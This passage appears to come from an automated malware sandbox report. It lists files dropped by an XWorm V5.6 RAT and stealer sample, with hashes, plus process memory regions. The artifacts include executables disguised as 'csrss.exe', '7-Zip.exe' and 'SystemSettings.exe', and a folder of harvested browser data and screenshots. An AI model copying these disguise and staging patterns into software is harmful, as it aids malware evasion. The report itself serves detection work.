                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\libssl-1_1.dll

                                                                                          Filesize

                                                                                          204KB

                                                                                          MD5

                                                                                          8e8a145e122a593af7d6cde06d2bb89f

                                                                                          SHA1

                                                                                          b0e7d78bb78108d407239e9f1b376e0c8c295175

                                                                                          SHA256

                                                                                          a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1

                                                                                          SHA512

                                                                                          d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\python311.dll

                                                                                          Filesize

                                                                                          1.6MB

                                                                                          MD5

                                                                                          5792adeab1e4414e0129ce7a228eb8b8

                                                                                          SHA1

                                                                                          e9f022e687b6d88d20ee96d9509f82e916b9ee8c

                                                                                          SHA256

                                                                                          7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967

                                                                                          SHA512

                                                                                          c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\rar.exe

                                                                                          Filesize

                                                                                          615KB

                                                                                          MD5

                                                                                          9c223575ae5b9544bc3d69ac6364f75e

                                                                                          SHA1

                                                                                          8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                          SHA256

                                                                                          90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                          SHA512

                                                                                          57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\rarreg.key

                                                                                          Filesize

                                                                                          456B

                                                                                          MD5

                                                                                          4531984cad7dacf24c086830068c4abe

                                                                                          SHA1

                                                                                          fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                          SHA256

                                                                                          58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                          SHA512

                                                                                          00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\select.pyd

                                                                                          Filesize

                                                                                          25KB

                                                                                          MD5

                                                                                          90fea71c9828751e36c00168b9ba4b2b

                                                                                          SHA1

                                                                                          15b506df7d02612e3ba49f816757ad0c141e9dc1

                                                                                          SHA256

                                                                                          5bbbb4f0b4f9e5329ba1d518d6e8144b1f7d83e2d7eaf6c50eef6a304d78f37d

                                                                                          SHA512

                                                                                          e424be422bf0ef06e7f9ff21e844a84212bfa08d7f9fbd4490cbbcb6493cc38cc1223aaf8b7c9cd637323b81ee93600d107cc1c982a2288eb2a0f80e2ad1f3c5

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\sqlite3.dll

                                                                                          Filesize

                                                                                          622KB

                                                                                          MD5

                                                                                          395332e795cb6abaca7d0126d6c1f215

                                                                                          SHA1

                                                                                          b845bd8864cd35dcb61f6db3710acc2659ed9f18

                                                                                          SHA256

                                                                                          8e8870dac8c96217feff4fa8af7c687470fbccd093d97121bc1eac533f47316c

                                                                                          SHA512

                                                                                          8bc8c8c5f10127289dedb012b636bc3959acb5c15638e7ed92dacdc8d8dba87a8d994aaffc88bc7dc89ccfeef359e3e79980dfa293a9acae0dc00181096a0d66

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI19922\unicodedata.pyd

                                                                                          Filesize

                                                                                          295KB

                                                                                          MD5

                                                                                          c2556dc74aea61b0bd9bd15e9cd7b0d6

                                                                                          SHA1

                                                                                          05eff76e393bfb77958614ff08229b6b770a1750

                                                                                          SHA256

                                                                                          987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d

                                                                                          SHA512

                                                                                          f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b

                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olu5f3ko.nwb.ps1

                                                                                          Filesize

                                                                                          60B

                                                                                          MD5

                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                          SHA1

                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                          SHA256

                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                          SHA512

                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                        • C:\Users\Admin\AppData\Local\Temp\csrss.exe

                                                                                          Filesize

                                                                                          7.0MB

                                                                                          MD5

                                                                                          00cc60a46cce0c2b385667ad457a76ab

                                                                                          SHA1

                                                                                          0b3036e2f7f91058199373648f9cf046eb760826

                                                                                          SHA256

                                                                                          11f1bc44b17149528328e90dca200559b6a24282a38ee9376ebc6b69610ed516

                                                                                          SHA512

                                                                                          4d5806c0c3890c530cf0e3090a94a95b734b326eb1adaf18e64fdbcb70d12cae23285b4cd97d896142e37a3a14753e86eecb67053741d2371f6f922628b254ca

                                                                                        • C:\Users\Admin\AppData\Local\UKTNMTZV\Browsers\Firefox\Bookmarks.txt

                                                                                          Filesize

                                                                                          105B

                                                                                          MD5

                                                                                          2e9d094dda5cdc3ce6519f75943a4ff4

                                                                                          SHA1

                                                                                          5d989b4ac8b699781681fe75ed9ef98191a5096c

                                                                                          SHA256

                                                                                          c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

                                                                                          SHA512

                                                                                          d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

                                                                                        • C:\Users\Admin\AppData\Local\UKTNMTZV\Process.txt

                                                                                          Filesize

                                                                                          4KB

                                                                                          MD5

                                                                                          13f85dbbb519b0e1b36cd307b4a92672

                                                                                          SHA1

                                                                                          c7da37b3e526916c7e7eae2f3961a546f5d36e03

                                                                                          SHA256

                                                                                          fdfc540793386d522cde748bf0e23cfd2748c2ebe8dd8a7b463ec46d18db8cf7

                                                                                          SHA512

                                                                                          1ab49625ec3b6005cd0c36e087190122138f76eacf3c10e26082293a2c536aaaed77899ac92a3fb314e2e8c34b34b6d1f0e1404d6cd6cef09c194c460ff1481a

                                                                                        • C:\Users\Admin\AppData\Local\UKTNMTZV\Screen.png

                                                                                          Filesize

                                                                                          266KB

                                                                                          MD5

                                                                                          787c267c4cfe21787957457228f327d9

                                                                                          SHA1

                                                                                          3466277f7289f4752e1e833ccfe74caee88b0273

                                                                                          SHA256

                                                                                          2290b9609b06c1d01a74d0041989b3a189f84c9420c78785439d23decb199975

                                                                                          SHA512

                                                                                          1cb8913cbdd680c18bfcdffc732b324de825b4e9324ec6a669935c813bcb3bbf9a74976fa94d45c2fffb1dfdeee80566d1bb431aa15ea1a0fb94a1192d48016c

                                                                                        • C:\Users\Admin\AppData\Local\e7014e18b0cbdf5ec1102a972cae0a83\Admin@UKTNMTZV_en-US\System\Process.txt

                                                                                          Filesize

                                                                                          4KB

                                                                                          MD5

                                                                                          96b02e187979af32089480bff28a09f3

                                                                                          SHA1

                                                                                          f8534359755ae0c0e3d869997ea9dec0a3663995

                                                                                          SHA256

                                                                                          63a847836bba0285b05d6cad64ebf67726fc34ae38688282b2e4169fba38973f

                                                                                          SHA512

                                                                                          59b02022887cf30c76ca8cd796ea64e33eda97b6d4b8a4987b24b71b07b542c8874a4166b7aa083c8819f4a5327051287ca717d60af66421e53263427cd7b0b6

                                                                                        • C:\Users\Admin\AppData\Roaming\7-Zip.exe

                                                                                          Filesize

                                                                                          7.0MB

                                                                                          MD5

                                                                                          0699da50b9077b0a286fcf065420e89c

                                                                                          SHA1

                                                                                          d4dda8b0302e7eb6620461574e64965a1b0136c9

                                                                                          SHA256

                                                                                          d029737c83f1e0ea369550fb1470f1bb00c7902c9b55bac8f2fc70070fce60ab

                                                                                          SHA512

                                                                                          4ca4600bd6686b1dea31a473ee63b366049c0e08f398b38b0c6f898dd9881f66c74df00584415014b8d1d512b1e97ae5d625f82de2942e6ebe1c3cc6ecade8ac

                                                                                        • C:\Users\Admin\Desktop\XWorm V5.6\Background.png

                                                                                          Filesize

                                                                                          924KB

                                                                                          MD5

                                                                                          c93ee3abeff4ac24936471f80b36ec7a

                                                                                          SHA1

                                                                                          0120649571a4b692ff5d10aae8dd87dffd3a0f81

                                                                                          SHA256

                                                                                          2f691caff7e1980cfb069d2608b6470b3a06cdb90467ce47820e8602115a0c5b

                                                                                          SHA512

                                                                                          dd319d1eea708284588ff67268cb23bd7b5cde505f3a8a1e7a27a587920ee5877efa4c1d8264cae48de343cabbf11bbe457b49f348b46288765eeff45d20cab5

                                                                                        • C:\Users\Admin\Desktop\XWorm V5.6\ClientsFolder\1928F8CDB120BCC20642\رقم ملاك.txt

                                                                                          Filesize

                                                                                          161B

                                                                                          MD5

                                                                                          694af16f3e424ae4c0eaf50e44c5b303

                                                                                          SHA1

                                                                                          d604e14062d7f148cf3e4c67e4725869ab5b3c9b

                                                                                          SHA256

                                                                                          f5587143f879aac6f6a7c33663ae7664516f81ea3146794eefea078f1cd70cf5

                                                                                          SHA512

                                                                                          d0e9cff63e91569f051ee56081b7603349a6c103fad7ac304043c415f000441ea7c05e0d8bcf4e3f1b93b979b2de25ebb687b9664824c8b4ed0667efc8ee258e

                                                                                        • C:\Users\Admin\Desktop\XWorm V5.6\XWorm V5.6.exe

                                                                                          Filesize

                                                                                          13.4MB

                                                                                          MD5

                                                                                          84ff3f849a7ec90bbd0705105f6340c6

                                                                                          SHA1

                                                                                          910c559a6fffca330baf657cbfe2275058205050

                                                                                          SHA256

                                                                                          91983c4ef5232bc6492532a5b0ee985eb4ea60fc9e9fe476f1eb5ed131b46280

                                                                                          SHA512

                                                                                          2b1c16982f7e887698b5966276af6e0338a45b0805c6bf7c3c6dcf5cffd37de1ef51a7258cb9b530cbc95959e2dc6a5504334dcc3041c24868b6c7f14d0c15d9

                                                                                        • C:\Users\Admin\Desktop\XWorm V5.6\XWorm V5.6.exe.config

                                                                                          Filesize

                                                                                          183B

                                                                                          MD5

                                                                                          66f09a3993dcae94acfe39d45b553f58

                                                                                          SHA1

                                                                                          9d09f8e22d464f7021d7f713269b8169aed98682

                                                                                          SHA256

                                                                                          7ea08548c23bd7fd7c75ca720ac5a0e8ca94cb51d06cd45ebf5f412e4bbdd7d7

                                                                                          SHA512

                                                                                          c8ea53ab187a720080bd8d879704e035f7e632afe1ee93e7637fad6bb7e40d33a5fe7e5c3d69134209487d225e72d8d944a43a28dc32922e946023e89abc93ed

                                                                                        • C:\Users\Public\Stub.exe

                                                                                          Filesize

                                                                                          320KB

                                                                                          MD5

                                                                                          76ae65533de8700dea2abcb58f10416c

                                                                                          SHA1

                                                                                          f0d40637cd083747e66e21aa922d8a252db230d6

                                                                                          SHA256

                                                                                          13a0ec68f08a283dc3ad9299a7acd52178e49872d6e64818dd5d0f4ec5aa8caa

                                                                                          SHA512

                                                                                          77787809cef588520c06b50466996bcc1bd0d13ef51ba89be49a348e5a758652aa5367387f8486be9ab83296e1737d5bdb826d12ee33cebf6d1064caee6ac8d2

                                                                                        • C:\Users\Public\SystemSettings.exe

                                                                                          Filesize

                                                                                          332KB

                                                                                          MD5

                                                                                          701a94f53d54d38a11f4e60bc4f95b18

                                                                                          SHA1

                                                                                          7413f5e4fc73eaf07d9d6cd67fc88fd40b70d9d0

                                                                                          SHA256

                                                                                          9233d5872258aa674b015b57a4f37ca43a22524a682382cd88969cef135dacdb

                                                                                          SHA512

                                                                                          4d63f155adbc5271fc82a263c4df29566ffbabb512ad2a7c73736969b29760bc0ae86e58f396907b8afa8791e8a8b042c895f94126a00da8c0b050e7ef343440

                                                                                        • memory/228-150-0x0000000000110000-0x0000000000E7E000-memory.dmp

                                                                                          Filesize

                                                                                          13.4MB

                                                                                        • memory/228-152-0x000000001BD30000-0x000000001CA4C000-memory.dmp

                                                                                          Filesize

                                                                                          13.1MB

                                                                                        • memory/228-245-0x00007FFBA27D0000-0x00007FFBA3292000-memory.dmp

                                                                                          Filesize

                                                                                          10.8MB

                                                                                        • memory/228-149-0x00007FFBA27D3000-0x00007FFBA27D5000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/228-151-0x00007FFBA27D0000-0x00007FFBA3292000-memory.dmp

                                                                                          Filesize

                                                                                          10.8MB

                                                                                        • memory/1668-414-0x0000000005E70000-0x0000000005F02000-memory.dmp

                                                                                          Filesize

                                                                                          584KB

                                                                                        • memory/1668-417-0x00000000064C0000-0x0000000006A66000-memory.dmp

                                                                                          Filesize

                                                                                          5.6MB

                                                                                        • memory/1668-424-0x0000000006390000-0x00000000063F6000-memory.dmp

                                                                                          Filesize

                                                                                          408KB

                                                                                        • memory/1668-354-0x0000000000290000-0x00000000002E6000-memory.dmp

                                                                                          Filesize

                                                                                          344KB

                                                                                        • memory/1872-355-0x00000000009E0000-0x0000000000A12000-memory.dmp

                                                                                          Filesize

                                                                                          200KB

                                                                                        • memory/1872-927-0x0000000005F00000-0x0000000005F0A000-memory.dmp

                                                                                          Filesize

                                                                                          40KB

                                                                                        • memory/1872-934-0x0000000005F10000-0x0000000005F22000-memory.dmp

                                                                                          Filesize

                                                                                          72KB

                                                                                        • memory/2472-413-0x0000000002320000-0x000000000233E000-memory.dmp

                                                                                          Filesize

                                                                                          120KB

                                                                                        • memory/2692-219-0x0000000000D20000-0x0000000000D7A000-memory.dmp

                                                                                          Filesize

                                                                                          360KB

                                                                                        • memory/2988-235-0x0000019FB0E80000-0x0000019FB0EA2000-memory.dmp

                                                                                          Filesize

                                                                                          136KB

                                                                                        • memory/3644-925-0x00000231ED820000-0x00000231ED82D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/3644-978-0x00000231ED820000-0x00000231ED82D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/3644-225-0x00000231EA9C0000-0x00000231EABB4000-memory.dmp

                                                                                          Filesize

                                                                                          2.0MB

                                                                                        • memory/3644-220-0x00000231CE970000-0x00000231CF686000-memory.dmp

                                                                                          Filesize

                                                                                          13.1MB

                                                                                        • memory/3656-278-0x0000000000620000-0x0000000000D30000-memory.dmp

                                                                                          Filesize

                                                                                          7.1MB

                                                                                        • memory/5012-400-0x00007FFB9E540000-0x00007FFB9E559000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/5012-969-0x00007FFB9C760000-0x00007FFB9C8D7000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/5012-408-0x00007FFB9C8E0000-0x00007FFB9CEC9000-memory.dmp

                                                                                          Filesize

                                                                                          5.9MB

                                                                                        • memory/5012-416-0x00007FFB9C2D0000-0x00007FFB9C2E4000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/5012-418-0x00007FFB9E590000-0x00007FFB9E5BD000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/5012-419-0x00007FFBB1700000-0x00007FFBB170D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/5012-409-0x00007FFB9C670000-0x00007FFB9C728000-memory.dmp

                                                                                          Filesize

                                                                                          736KB

                                                                                        • memory/5012-422-0x00007FFB9C1B0000-0x00007FFB9C2CC000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/5012-411-0x00007FFB9C2F0000-0x00007FFB9C668000-memory.dmp

                                                                                          Filesize

                                                                                          3.5MB

                                                                                        • memory/5012-412-0x00007FFBA3CD0000-0x00007FFBA3CF3000-memory.dmp

                                                                                          Filesize

                                                                                          140KB

                                                                                        • memory/5012-453-0x00007FFB9E560000-0x00007FFB9E583000-memory.dmp

                                                                                          Filesize

                                                                                          140KB

                                                                                        • memory/5012-530-0x00007FFB9C760000-0x00007FFB9C8D7000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/5012-360-0x00007FFBA3CD0000-0x00007FFBA3CF3000-memory.dmp

                                                                                          Filesize

                                                                                          140KB

                                                                                        • memory/5012-554-0x00007FFB9E540000-0x00007FFB9E559000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/5012-410-0x000001A026D40000-0x000001A0270B8000-memory.dmp

                                                                                          Filesize

                                                                                          3.5MB

                                                                                        • memory/5012-617-0x00007FFB9C730000-0x00007FFB9C75E000-memory.dmp

                                                                                          Filesize

                                                                                          184KB

                                                                                        • memory/5012-404-0x00007FFB9C730000-0x00007FFB9C75E000-memory.dmp

                                                                                          Filesize

                                                                                          184KB

                                                                                        • memory/5012-726-0x00007FFB9C670000-0x00007FFB9C728000-memory.dmp

                                                                                          Filesize

                                                                                          736KB

                                                                                        • memory/5012-727-0x000001A026D40000-0x000001A0270B8000-memory.dmp

                                                                                          Filesize

                                                                                          3.5MB

                                                                                        • memory/5012-781-0x00007FFB9C2F0000-0x00007FFB9C668000-memory.dmp

                                                                                          Filesize

                                                                                          3.5MB

                                                                                        • memory/5012-402-0x00007FFBB1FE0000-0x00007FFBB1FED000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/5012-826-0x00007FFBA3CD0000-0x00007FFBA3CF3000-memory.dmp

                                                                                          Filesize

                                                                                          140KB

                                                                                        • memory/5012-825-0x00007FFB9C8E0000-0x00007FFB9CEC9000-memory.dmp

                                                                                          Filesize

                                                                                          5.9MB

                                                                                        • memory/5012-831-0x00007FFB9C760000-0x00007FFB9C8D7000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/5012-398-0x00007FFB9C760000-0x00007FFB9C8D7000-memory.dmp

                                                                                          Filesize

                                                                                          1.5MB

                                                                                        • memory/5012-396-0x00007FFB9E560000-0x00007FFB9E583000-memory.dmp

                                                                                          Filesize

                                                                                          140KB

                                                                                        • memory/5012-394-0x00007FFBA3CB0000-0x00007FFBA3CC9000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/5012-392-0x00007FFB9E590000-0x00007FFB9E5BD000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/5012-378-0x00007FFBB2180000-0x00007FFBB218F000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/5012-935-0x00007FFB9C8E0000-0x00007FFB9CEC9000-memory.dmp

                                                                                          Filesize

                                                                                          5.9MB

                                                                                        • memory/5012-974-0x00007FFB9C670000-0x00007FFB9C728000-memory.dmp

                                                                                          Filesize

                                                                                          736KB

                                                                                        • memory/5012-972-0x00007FFB9C730000-0x00007FFB9C75E000-memory.dmp

                                                                                          Filesize

                                                                                          184KB

                                                                                        • memory/5012-971-0x00007FFBB1FE0000-0x00007FFBB1FED000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/5012-970-0x00007FFB9E540000-0x00007FFB9E559000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/5012-353-0x00007FFB9C8E0000-0x00007FFB9CEC9000-memory.dmp

                                                                                          Filesize

                                                                                          5.9MB

                                                                                        • memory/5012-964-0x00007FFB9E560000-0x00007FFB9E583000-memory.dmp

                                                                                          Filesize

                                                                                          140KB

                                                                                        • memory/5012-963-0x00007FFBA3CB0000-0x00007FFBA3CC9000-memory.dmp

                                                                                          Filesize

                                                                                          100KB

                                                                                        • memory/5012-962-0x00007FFB9E590000-0x00007FFB9E5BD000-memory.dmp

                                                                                          Filesize

                                                                                          180KB

                                                                                        • memory/5012-961-0x00007FFBB2180000-0x00007FFBB218F000-memory.dmp

                                                                                          Filesize

                                                                                          60KB

                                                                                        • memory/5012-960-0x00007FFBA3CD0000-0x00007FFBA3CF3000-memory.dmp

                                                                                          Filesize

                                                                                          140KB

                                                                                        • memory/5012-957-0x00007FFB9C2F0000-0x00007FFB9C668000-memory.dmp

                                                                                          Filesize

                                                                                          3.5MB

                                                                                        • memory/5012-949-0x00007FFB9C1B0000-0x00007FFB9C2CC000-memory.dmp

                                                                                          Filesize

                                                                                          1.1MB

                                                                                        • memory/5012-948-0x00007FFBB1700000-0x00007FFBB170D000-memory.dmp

                                                                                          Filesize

                                                                                          52KB

                                                                                        • memory/5012-947-0x00007FFB9C2D0000-0x00007FFB9C2E4000-memory.dmp

                                                                                          Filesize

                                                                                          80KB

                                                                                        • memory/5392-548-0x000001E29A1D0000-0x000001E29A1D8000-memory.dmp

                                                                                          Filesize

                                                                                          32KB